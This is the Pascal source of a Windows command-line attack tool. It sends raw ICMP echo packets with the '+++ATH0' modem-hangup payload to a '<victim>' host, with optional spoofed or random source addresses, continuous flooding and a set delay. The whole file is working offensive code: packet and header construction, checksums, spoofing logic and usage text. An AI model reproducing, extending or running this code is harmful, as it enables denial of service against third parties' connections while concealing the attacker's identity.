unit MainUnit;

interface

uses
  Winsock2, SysUtils2, SocketHeaders;

type
  TAthOpt = packed record
    Delay: Cardinal;
    HedefAdres: TSockAddrIn;
    Num: Cardinal;
    Sended: Cardinal;
    Socket: TSocket;
    Source: Cardinal;
  end;

var
  AthOpt: TAthOpt;

  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(host: PChar): Cardinal;
  procedure CreateSocket;
  procedure SendAth;
  procedure SendAth_FillIPhdr(var IPhdr: PIPhdr);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(S: string);

implementation

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
begin
  WSASetLastError(0);
  Result:=Sendto(S, Buf, len, flags, addrto, tolen);
  //if WSAGetLastError <> 0 then Writeln('Unable to send icmp packet no: ' + InttoStr(AthOpt.Sended));
  WSACancelBlockingCall;
  WSAUnhookBlockingHook;
end;

function Resolve(host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr:=inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then begin
    HostEnt:=GetHostByName(host);
    if not Assigned(HostEnt) then begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result:=InAddr.S_addr;
end;

procedure CreateSocket;
begin
  AthOpt.Socket:=Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if AthOpt.Socket = INVALID_SOCKET then begin
    Writeln('Unable to create socket');
    Halt(0);
  end;
  if SetSockOpt(AthOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', Sizeof(PInteger)) <> 0 then begin
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Data = '+++ATH0'#13#10;
  Len = 28 + Length(Data);

procedure SendAth;
var
  Buffer: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr;
  ICMPhdr: PICMPhdr;
begin
  FillChar(Buffer[0], Sizeof(Buffer), 0);
  IPhdr:=PIPhdr(@Buffer[0]);
  ICMPhdr:=PICMPhdr(@Buffer[20]);
  Move(Data[1], Buffer[28], StrLen(Data));
  SendAth_FillIPhdr(IPhdr);
  ICMPhdr.icmp_type:=8;
  IPhdr.ip_sum:=CheckSum(@IPhdr^, 20);
  ICMPhdr.icmp_sum:=CheckSum(@ICMPhdr^, Len - 20);
  Gonder(AthOpt.Socket, Buffer[0], Len, 0, AthOpt.HedefAdres, Sizeof(AthOpt.HedefAdres));
end;

procedure SendAth_FillIPhdr(var IPhdr: PIPhdr);
begin
  Random;
  IPhdr.ip_verlen:=$45;
  IPhdr.ip_len:=htons(Len);
  IPhdr.ip_id:=htons(Random(65535));
  IPhdr.ip_ttl:=255;
  IPhdr.ip_p:=1;
  IPhdr.ip_src:=AthOpt.Source;
  if AthOpt.Source = 0 then IPhdr.ip_src:=(Integer(Random(65535)) shl 16 ) + Random(65535);
  IPhdr.ip_dst:=AthOpt.HedefAdres.sin_addr.S_addr;
end;

procedure SetDefaultOptions;
begin
  AthOpt.HedefAdres.sin_addr.S_addr:=Resolve(PChar(ParamStr(1)));
  AthOpt.Delay:=0;
  AthOpt.HedefAdres.sin_family:=AF_INET;
  AthOpt.HedefAdres.sin_port:=htons(1243);
  AthOpt.Num:=0;
  AthOpt.Sended:=0;
  AthOpt.Source:=0;
end;

procedure SetParams;
var
  i: integer;
  S: string;
  C: Char;
begin
  for i:=2 to ParamCount do begin
    S:=ParamStr(i);
    C:=#0;
    if Length(S) = 2 then if S[1] = '-' then C:=S[2];
    case C of
      's' : AthOpt.Source:=Resolve(PChar(ParamStr(i + 1)));
      'n' : AthOpt.Num:=StrtoIntDef(ParamStr(i + 1), 0);
      'd' : AthOpt.Delay:=StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(S: string);
begin
  Write(
        'usage: ' + S + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -s:    Spoof host     (0 is random (default))'#13#10 +
        '  -n:    Num of packets (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)  (default 0)'#13#10
       );
  Halt(0);
end;

end.
